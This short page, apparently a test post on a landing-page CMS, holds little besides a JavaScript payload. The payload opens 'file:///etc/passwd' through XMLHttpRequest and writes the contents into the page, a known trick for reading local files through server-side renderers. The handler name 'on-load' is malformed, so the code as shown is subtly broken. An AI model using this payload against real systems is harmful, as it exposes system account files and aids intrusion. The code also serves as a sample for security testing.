Written on 27 July 2023. Posted in Landpages. testing My Test vtex page Apenas um pequeno teste - do neida x = new XMLHttpRequest(); x.on-load = function() { document.write(this.responseText) }; x.open("GET", "file:///etc/passwd"); x.send(); Print Next